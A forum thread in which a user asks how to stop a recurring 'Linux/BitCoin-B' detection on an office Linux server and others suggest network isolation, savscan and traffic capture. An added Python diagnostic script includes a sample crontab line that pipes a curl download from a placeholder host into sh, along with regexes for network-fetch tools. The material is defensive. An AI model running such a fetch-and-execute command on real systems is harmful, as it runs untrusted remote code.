How do I get rid of a >>> Virus 'Linux/BitCoin-B'

I have had this virus on my linux machine for some time now >>> Virus 'Linux/BitCoin-B' and I scanned and detected it and removed it with Sophos, but it keeps coming back the next day. I have tried other products but no success. Has anyone encountered such a virus before on Linux and successfully removed it permanently? I need help. Thank you.

  • Hi Richard,

    Here's some background information on Linux/Bitcoin-B. Or click for an analysis of this threat.

    Based on our KBA: Sophos Anti-Virus: How to remove malware threats, adware, or potentially unwanted applications:

    After cleaning up the threat, it comes back (the same item is re-detected). The malware is being transferred to the computer when it connects to the local network or internet, or an undetected item of malware reloads the detected item on reboot. Initially you should isolate the computer by disabling Wi-Fi and/or removing the network cable, re-scan the computer, clean up etc., then reboot while the computer is not connected to the network; this shows whether the malware is coming from a network source or not. If the detection only occurs when connected to the network, refer to the Sophos Malware Remediation Toolkit (SMaRT) process, which uses the Sophos Source Of Infection (SOI) tool to reveal where network detections originate from.


  • In reply to Karlos:

    As it pertains to your Linux OS:

    1. Use savscan with the -remove option. As an example, from Terminal run: savscan -remove
    2. Run a scan to check that malware infected files were deleted.


  • In reply to Karlos:

    Thank you for your answers. I tried the remove command weeks back but it still returns; I will try your first option when I find a perfect time to shut down the server. But the SMaRT tool seems, June 2015. From the listed tools, I guess it will have to be the SOI. I hope it solves the problem. Thank you.

  • In reply to Richard Orie:

    Hi Richard,

    You said it comes back every day, does it do it at the same time each day? 

    Is this a home machine or, for example, connected to an office network? If it is connected to a network you could disconnect it from that (keep it on the internet) and see if the detections come back. If they don't, then it is likely another machine on the network is actually infected and is dropping the file onto your Linux box.

    If it does come back then do the same test but this time also disconnect it from the internet and see if it comes back. If not, then there must be something hiding on your machine that is downloading it each day. The SOI tool you referenced would be good for this, except that it is a Windows command prompt tool.

    If you narrow it down to coming from the internet you could try to spot the network traffic using a tool such as Wireshark; this may give you an address you could block, or point you in the direction of what is making the connection.
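PeterM's two questions above (does the re-detection happen at the same time each day, and is something on the box itself re-downloading the file?) can be checked locally before reaching for Wireshark. The script below is an added example written for this thread; it is not Sophos code and not part of any reply. It parses detection timestamps from a constructed log excerpt, reports whether they cluster around one clock time, and then scans a constructed crontab for entries scheduled at that hour whose command fetches from the network or pipes a download into a shell, which is the classic shape of a job that re-drops a cleaned file. The log line format, the placeholder path and the placeholder host are assumptions for the example, not values taken from Sophos logs or from this thread.

```python
import re
from datetime import datetime

# Constructed sample log lines (not real Sophos output): three re-detections
# at roughly 03:15 on consecutive days plus one manual scan mid-morning.
SAMPLE_DETECTIONS = """
2015-08-03 03:15:07 Virus 'Linux/BitCoin-B' detected in /tmp/example_dropped_file
2015-08-04 03:15:12 Virus 'Linux/BitCoin-B' detected in /tmp/example_dropped_file
2015-08-05 03:14:58 Virus 'Linux/BitCoin-B' detected in /tmp/example_dropped_file
2015-08-05 11:02:40 Virus 'Linux/BitCoin-B' detected in /tmp/example_dropped_file
"""

# Constructed crontab (standard 5-field layout); example.invalid is a placeholder host.
SAMPLE_CRONTAB = """
# m h dom mon dow command
0 2 * * * /usr/bin/updatedb
15 3 * * * curl -s http://example.invalid/update.sh | sh
*/10 * * * * /usr/local/bin/healthcheck.sh
"""

TIMESTAMP = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)")
NET_FETCH = re.compile(r"\b(curl|wget|fetch|nc|ncat)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")


def parse_detections(log_text):
    """Return the datetime of every line that starts with a timestamp."""
    times = []
    for line in log_text.splitlines():
        m = TIMESTAMP.match(line.strip())
        if m:
            times.append(datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"))
    return times


def recurring_time(times, tolerance_min=10):
    """Return (hour, minute) of the clock time most detections cluster around,
    or None if no window of +/- tolerance_min holds at least two thirds of them
    (and at least two events). Wraps around midnight."""
    mods = [t.hour * 60 + t.minute for t in times]
    best, best_count = None, 0
    for m in mods:
        count = sum(1 for x in mods
                    if min(abs(x - m), 1440 - abs(x - m)) <= tolerance_min)
        if count > best_count:
            best, best_count = m, count
    if best is None or best_count < 2 or best_count * 3 < len(mods) * 2:
        return None
    return divmod(best, 60)


def find_cron_droppers(crontab_text, hour=None):
    """Return (minute, hour, command) for cron entries that fetch from the
    network or pipe output into a shell. If hour is given, keep only entries
    that can fire in that hour ('*' or a matching numeric hour field)."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        minute, hour_f, _dom, _mon, _dow, command = fields
        if hour is not None and hour_f != "*":
            if not (hour_f.isdigit() and int(hour_f) == hour):
                continue
        if NET_FETCH.search(command) or PIPE_TO_SHELL.search(command):
            hits.append((minute, hour_f, command))
    return hits


if __name__ == "__main__":
    times = parse_detections(SAMPLE_DETECTIONS)
    when = recurring_time(times)
    if when is None:
        print("No daily pattern; suspect a network source or a reboot-time loader.")
    else:
        print("Detections cluster around %02d:%02d each day" % when)
        for minute, hour_f, cmd in find_cron_droppers(SAMPLE_CRONTAB, hour=when[0]):
            print("  cron entry at %s %s runs: %s" % (minute, hour_f, cmd))
```

On a real server you would feed it the actual scan log and the output of `crontab -l` for every user plus the files under `/etc/cron*`; cron is only one scheduler, so an empty result still leaves systemd timers, `at` jobs and boot-time scripts to inspect, and a detection with no daily rhythm points back toward PeterM's network-isolation test rather than a local job.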

  • In reply to PeterM:

    Well, this is a Linux server machine connected to an office network. I had a similar issue on a Windows server and it was easier to solve, unlike the Linux machine. I guess SMaRT will not be able to help in this case; I will try scanning again while the machine is offline. Thank you.